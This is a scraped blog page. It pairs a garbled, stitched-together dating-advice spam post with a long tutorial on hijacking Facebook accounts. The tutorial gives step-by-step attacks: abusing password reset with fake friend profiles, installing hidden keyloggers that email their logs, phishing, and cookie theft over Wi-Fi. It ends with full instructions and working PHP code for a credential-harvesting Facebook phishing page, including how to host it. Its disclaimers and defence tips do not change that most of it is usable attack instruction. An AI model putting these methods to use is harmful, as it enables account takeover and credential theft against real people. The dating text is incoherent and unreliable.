If you enjoyed this post, you should read this: Herbalife Nutrition Launches Products to Help Busy Americans Stay Healthy | Business Wire
from https://ift.tt/2OuoLFm
0 notes
risprinabeachw-blog · 5 years
Text
Do dating sites work yahoo answers
Do Dating Websites Work Or do you look absolutely stunning—showing a little skin, wearing fresh makeup, looking happy? Years ago, I was just out of a terrible relationship and in no mood to date again.  What happens if I decide not to include a photo? Create a sense of mystery and excitement and give people a concrete reason to contact you.  This may seem counterintuitive, but it can be harder to find what you're looking for in denser geographic areas.  There was just one problem: I didn't want to throw myself back into the dating pool.  How much should I explain about myself in my profile? The problem has to do with how dating sites collect and parse our data.
9 Answers for the Online Dating Questions Everyone Asks I just wanted to find the right man, someone who was perfect for me.  Chances are extremely good that few people will click through your profile.  It's entirely possible though that you've done nothing wrong at all and that you have a very good profile.  It causes people to click and buy.  Maybe it's coming across as bitter rather than funny.  Between the time I started online dating and now, I've discovered exactly how dating websites work.
9 Answers for the Online Dating Questions Everyone Asks The site will use your behavioral data and match you on that.  If you use Pinterest, which puts all its emphasis on photos, you already know the power of an image.  Use the same approach when writing your profile.  But again, there might be a good reason you're clicking on men who seem contrary to your stated preferences: You're curious, you're bored, you're looking with a girlfriend and that happens to be her type.  There are many variables, so try to evaluate each one.  If you're not having any luck, try expanding your geographic zone if you're willing to travel.  I've tracked and analyzed data, spoken to computer scientists, and figured out what makes certain profiles successful.
Do Dating Websites Work I wasn't interested in meeting dozens of single men.  This can be an advantage, although in my experience other people often choose inappropriate people as a match for you, despite their good intentions.  In most cases, it's random chance.  You need to post two to four casual photos of just yourself.  A lot of sites ask some very basic questions, like whether you smoke or what religion you are.  Set your location, age, and gender preferences and you'll see a stream of pictures showing who's available nearby.  It has to do more with neuroscience than superficiality.
Do Dating Websites Work Best of all, there were hundreds of online dating sites waiting for me to sign on.  If they do send you a message, a photo is likely to be the first thing they ask for.  With this in mind, think about the photos you've uploaded.  How long is this going to take? We offer a wide range of dating profiles for dating sites and social networking sites as well. .  Why isn't anyone contacting me? In part because of how dating sites are designed, most of us see photos first, and that's when we determine whether to read through the rest of a profile.  Going in to refresh your profile once a day could potentially help, depending on the dating site you're using.
9 Answers for the Online Dating Questions Everyone Asks I wasn't interested in meeting dozens of single men. My friends were all excited for my between-boyfriend time.  Between the time I started online dating and now, I've discovered exactly how dating websites work.  Enough to create a curiosity gap.  I'd enjoy an exhilarating freedom—I could learn how to paint or wear yoga pants all weekend long if I wanted.  Whether you're creating a new profile or you're a longtime, frustrated online dater, I have some insights that will help make your experience better.  If you're looking for a long-term relationship, stick with the traditional online dating sites.
9 Answers for the Online Dating Questions Everyone Asks There was just one problem: I didn't want to throw myself back into the dating pool.  We may fib a little when describing whether we smoke, but what incentive is there to stretch the truth about what we want in a mate? If you're looking for a long-term relationship, you probably should buy at least a three-month membership.  Are you using the best possible photos? Did you write an extremely long profile? Here are some basic answers to the questions you might be too embarrassed to ask.  Think about how websites write their headlines, e.  They allow members to create their own Web page, access to popular free music videos and more.  I live in a massive city with millions of possibilities—why can't I find anyone good online? I live in a small town with slim pickings.  There's a much better way of matching people—asking you to describe exactly what you're looking for in specific terms.
9 Answers for the Online Dating Questions Everyone Asks It was exhausting and often demoralizing.  I keep hearing about dating apps, like Tinder.  That said, if you know exactly what you're looking for and you have a strategy, it may take only a few weeks.  Online retailers showcase photos of their products for good reason.  Some reward more active users with better placement especially if they filter by last log in or update.
Do Dating Websites Work If you smoke a cigarette every now and again, maybe only when you're having a cocktail, does that make you a smoker? Dating sites are built to interview you individually, and I'd hazard a guess that you're not painting a truly accurate picture of yourself online.  It may seem like online dating is straightforward, but what's happening behind the scenes—and your screen—can be confusing and can often produce bizarre results.  Some sites ignore your answers and instead look at your behaviors.  Am I really being matched with someone specifically for me, or is it all random chance? I don't want anyone to know who I am in real life.  Even if you do immediately find the man of your dreams, it'll take a few months of dating before you know whether you're officially out of the dating pool.  But you need to be explicit and honest about where you live early on—and you need to be willing to put in the effort to drive out to see the people you're meeting.  If you're willing to expand your reach to the maximum number of miles allowed, or if you're able to drive to the next town over, then yes.
9 Answers for the Online Dating Questions Everyone Asks How are they different from online dating sites? A bigger population tends to mean more people online, and choosier daters.  Will anyone actually read my profile, or are they just looking at my photos? Unlike online dating sites, most mobile apps are free, require just a few seconds to set up, and include a real-time geolocation feature, which is to say that they're more immediate.  Once I had my own strategy in place, the next date I went on turned out to be my last one ever.  I went on the internet for some years now and do not remember there being an Internet without the Italian dating services on the Internet.  Just about everyone uses them for casual meetups, but some women I know claim that they're finding significant others using apps like Tinder.  An attractive guy would send me a message.
0 notes
Text
How To Hack Facebook Account
How To Hack Facebook Account
Hacking Facebook
Facebook is easily the most popular social networking site in the entire world. Each day, millions and millions of users log in to check their news feeds, connect with friends and family, and even make calls. There’s just one problem. People, even those who aren’t adept at hacking, can compromise others’ accounts by stealing their passwords. It may sound like something out of an action film, but the honest truth is that there are unbelievably simple methods that most people can use to gain access to someone else’s Facebook account. If you want to become a competent hacker, knowing methods for hacking Facebook passwords is paramount to your learning. Now, I certainly don’t advocate using these methods to break into other people’s personal accounts and compromise their privacy. Not only is that illegal, it is morally wrong. If you’re reading this because you want to get back at an ex or cause disruption, then you probably shouldn’t be reading this book. On a more practical note, knowing how people hack into Facebook accounts is critical if you want to avoid being hacked. There are several things users can do to protect themselves from the most common Facebook attacks, as we’ll discuss later.
1: The Password Reset
This type of attack lacks the razzle-­‐dazzle of the more complex types of attacks, but the fact remains that it is a simple yet effective way to commandeer another users’ Facebook profile. In fact, this method is commonly used to hijack all sorts of different online accounts. By changing the password, the attacker not only gains access to the profile, but they simultaneously bar the owner of the account from accessing their profile. More often than not, this attack is performed by a friend or acquaintance that has access to the target’s personal computer or mobile device. You’d be surprised how many people don’t even log   out Facebook or cache their username and password in their browser because they are lazy. The steps are as follows: ⦁ Step 1: The first step in this attack is to determine the email address used to login to a user’s profile. If an attacker doesn’t already know the target’s email addresses, guess what? Most people list this information in the contact section of their Facebook profile.
⦁ Step 2: Now all an attacker needs to do is click on the Forgotten your password? button and enter in the assumed email address of the target. Next, an attacker would click on the This is my account
⦁ Step 3: Next, the password reset procedure will ask if the user wants to reset their password via email. However, many times people will delete old email accounts and use new ones. That’s why there’s a link that says No longer have access to these? Click the link to continue.
⦁ Step 4: The next step in the process is to update the email address linked to the account. The prompt will ask for new contact information via the How can we reach you? Make sure the email address you enter isn’t linked to another Facebook profile.
⦁ Step 5: This step is a little more challenging, because it will ask a security question.   If the attacker knows the target personally, this is going to be extremely easy. However, if the attacker doesn’t know the target very well, they can make an educated guess. Sometimes they even dig through the victim’s Facebook profile to glean information about possible correct answers to the security question. Once the correct answer has been discovered, the attacker needs to wait 24 hours before they can login.
⦁ Step 6: In the event that the attacker couldn’t guess the right answer to the security question, there is an option to Recover your account with help from friends. The only problem is that a lot of people ‘friend’ people on Facebook that they don’t know too well. Select between 3 and 5 friends that will be candidates for the rest of the attack process.
⦁ Step 7: This part of the password reset process sends passwords to the friends. There are two methods to this part of the process. Firstly, an attacker can contact these individuals from the fake email address to request the new password, and bonus points if the email address looks like the actual victim. In addition, the attacker can create 3 to 5 fake Facebook profiles and try to ‘friend’ the target on Facebook ahead of time. Then, all the attacker would need to do is select 3 to 5 of the bogus profiles during the procedure. How to Prevent This Attack It’s frightening how easy this attack is to carry out. The good news is that there are several things users can do to protect themselves from becoming the next victim of an attack as follows: ⦁ Use an email address that is only dedicated to Facebook use.
⦁ Don’t list your email address on your Facebook profile.
⦁ Make your security question as complex and difficult to guess as possible. If you really want to get tricky, you could enter a bogus answer that is unrelated to the question (as long as you can remember it!). For example, if the security question asks for your mother’s maiden name, you could enter “JohnjacobjingleheimershmidtLarsson” (though there is character limit) or some other variant that is nearly impossible to guess. Omit personal information that is easy to guess such as pet names, birthdates, anniversaries, etc.
2: Using the Infamous Keylogger Method
A keylogger is a nasty piece of software because it records every single keystroke a user   types and records that information invisibly. Usernames, passwords, and payment card data are all up for grabs if a hacker successfully installs a keylogger on a target’s computer. The first type we’ll look at for hacking Facebook is a software keylogger. The problem with software keyloggers is getting them installed on the target computing device. This can be extremely complex if a hacker wants to do it remotely, but if an attacker  is a friend or personal acquaintance of the target, then this step becomes much easier. There are plenty of different keyloggers out there, but you can find many of them absolutely free    of charge. After the software has been installed on the target computer, make sure you configure the settings to make it invisible and to set an email that the software will send the reports to.
Hardware Keyloggers
There are also hardware keyloggers in existence that look like a flash drive or wireless USB stick. These really work best on desktop computers because they can be inserted into the back of the computer – and as they say, outta sight, outta mind. The code on the USB stick will effectively log keystrokes, though it isn’t effective for laptops. Some of them even look like old PS2 keyboard and mouse jacks. You can easily find one online.
How to Prevent This Attack
Keyloggers are nasty business, but there are several things users can do to protect themselves online as follows: ⦁ Use firewalls. Keyloggers have to send their report of logged keystrokes to another location, and some of the more advanced software firewalls will be able to detect suspicious activity.
⦁ Also, users should use a password database. These handy password vaults usually have tools that automatically generate random, secure passwords. You see, the keylogger won’t be able to see these passwords since you didn’t technically type them. Just make sure you always copy/paste the passwords when you log into an account.
⦁ Stay on top of software updates. Once an exploit has been found in an operating system, the OS manufacturer will typically include patches and bug fixes in following updates to ensure that the attack can’t be performed again.
⦁ Change passwords on a regular basis. Some users who are extremely security conscious will change their passwords every two weeks or so. If this sounds too tedious, you could even do it every month or every three months. It may seem unreasonably zealous, but it will render stolen passwords useless.
3: Phishing
You’d be surprised how gullible the average Internet user is these days. Most people don’t even check the URL of the site they are visiting as long as the web page looks as they expected it to look. A lot of people have created links to bogus URLs that looks and behaves exactly like the Facebook login page. Often times these fake links are embedded into social media buttons on a website. For example, there might be a “Share on Facebook” link, but in order to share the content the user first needs to login to their account. The phishing attempt simply stored the user’s credentials instead of sending them to their Facebook account. Some of the more advanced ones store a copy of the user’s input, and then supply that information to the actual Facebook login page. To the user, it looks as though they have genuinely logged into Facebook, when in fact, they first visited a phishing site. Believe it or not, it isn’t that difficult to clone a website. All an attacker needs is a fake page and a passable URL that is extremely close to the real URL. Furthermore, attackers can mass email these links to email lists that are purchased online – and they’re dirt cheap, too. Though it is 2016 and phishing filters are becoming increasingly sophisticated, they’re not perfect.
How to Prevent This Attack
There are a few simple and basic things users can do to prevent becoming the next victim of a phishing attack as follows: ⦁ Never follow links from emails, especially those that come from sources you don’t already know. If you think you can trust the sender, always check the URL of the link before visiting the page. However, it’s better to visit the website directly.
⦁ Always check links on forums, websites, chatrooms, etc. Believe it or not, even popup ads can contain bogus links to phishing sites. If it doesn’t look legit, don’t click on it!
⦁ Always use ant-­‐virus and security software. Many of them include phishing filters that will stop users from visiting phishing sites.
4: Stealing Cookies
Cookies are a necessary evil for some sites, but too often users lazily store their login credentials in browser cookies without knowing any better. But an attacker doesn’t always need access to a target’s computer to steal a cookie. There are many sniffing techniques that can be performed across a LAN, such as the wireless network in a coffee shop. Once the cookie has been stolen, the hacker can then load the cookie into their browser, fooling Facebook into believing that the victim has already logged into their account.
For example, an attacker could utilize Firesheep, which is an add-­‐on for Firefox that sniffs traffic on Wi-­‐Fi networks to steal cookies and store them within the attacker’s web browser. Once the attacker has stolen the cookie, they can login to the target’s Facebook account, provided that the target is still logged in. Then, the attacker can change the password of the profile. However, if the victim logs out of Facebook, the cookie will be worthless. Final Thoughts on Facebook Security and Attack Prevention There are also some general techniques and best practices to avoid becoming the next  victim of a Facebook attack. Some of them should be common sense, but too many users fail to give security a second thought. ⦁ Only use trusted wireless networks. If you need an Internet connection and happen to spot an unknown SSID, it’s in your best interest to leave it alone.
⦁ Within your Facebook profile, click on Account Settings and look in the Security Enable Secure Browsing, and make sure you always use HTTPS to prevent cookie theft.
⦁ Always log out after you are finished browsing Facebook to prevent a cookie attack. Too many users simply click the “X” in their tab or browser, which doesn’t log you out.
⦁ Connect using a VPN connection. This will encrypt all of your data before sending it to the VPN server, so local network attackers won’t be able to see what data you’re transmitting.
⦁ Less is more. Though users are frequently tempted to share their personal information with the world, you would do well to limit how much information you post online. Make sure private information such as email addresses, current location, and other similar information isn’t shared on Facebook.
⦁ Only befriend people that you trust. There are too many scams circulating that try to build trust with a target. The only problem is you have no idea who these strangers are, and more often than not, they’re trying to take advantage of you.
How to Create a Facebook Phishing Page
The most effective hacking attack always has been and always will be social engineering as it will always be easier to trick an unsuspecting victim than to defeat technological controls. In this tutorial, we’re going to take a close look at how to setup a phishing page to harvest usernames and passwords that can be used to hack other users’ Facebook accounts. However, and I can’t stress this enough, this knowledge should never be used to attack others in the real world. It simply isn’t legal, and it isn’t moral, either. If you’ve ever had your username or password stolen, you know how bad it feels when others have violated your privacy.
If you’re reading this with the hopes of learning how to gain access to countless users’ Facebook credentials, I should instead refer you to philosophical ideas on morality. Keeping that in mind, there is a lot of value, especially for aspiring hackers, to understanding how phishing works. Not only will it help you avoid mistakes that threaten your security and privacy, but it will also help you spot fishy phishing sites.
What is Phishing?
Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows. A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attack’s victim, actually entered their private information into a hacker’s website. And now the hacker has their login credentials! In Facebook, this may not be as consequential as another website, like online banking. However, the hacker can now wreak ungodly amounts of havoc on a person’s social life. If it happens to be a business’s Facebook profile, they can damage their business. Today, however, we are going to setup an imitation Facebook login page to show you just how easy it is to start phishing. Let’s take a closer look at the steps required. ⦁ Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
⦁ Go ahead and dump all of the page’s source code into Notepad (or your operating system’s best simple text editor.
⦁ If using Notepad, hit ctrl + f (which is the find hotkey) and search for action.
⦁ You should see a line that looks like this: action="https:⦁ //www⦁ .facebook.com/login.php?login_attempt=1⦁ "
⦁ Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php”
⦁ Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
⦁ Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:
<?php header ('Location:http://www.facebook.com/'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
⦁ At this point, you should now have two files saved: index.htm and post.php.
⦁ Next, this code actually needs to be uploaded to a web hosting service. There are  free hosting providers, but I wouldn’t recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we’ll be using 000Webhost.
⦁ After you have signed up for an account, browse to the control panel, and then to file manager.
⦁ Once the window opens, go to publick_html.
⦁ Delete default.php, and then upload index.htm and post.php.
⦁ Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
⦁ The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
⦁ Now go back to the file manager and public_html. There should be a file labeled username.txt.
⦁ Open this file and you should be able to see login credentials that have been entered by a test user. Final Thoughts
It really is a simple matter of copying the code from the Facebook login screen, adding some php code, and then setting up a dummy website. Again, don’t try this in the real world, because the consequences could be terrible. However, in a home environment on your own web server, this tutorial provides great insight into how attackers phish for usernames and passwords.
0 notes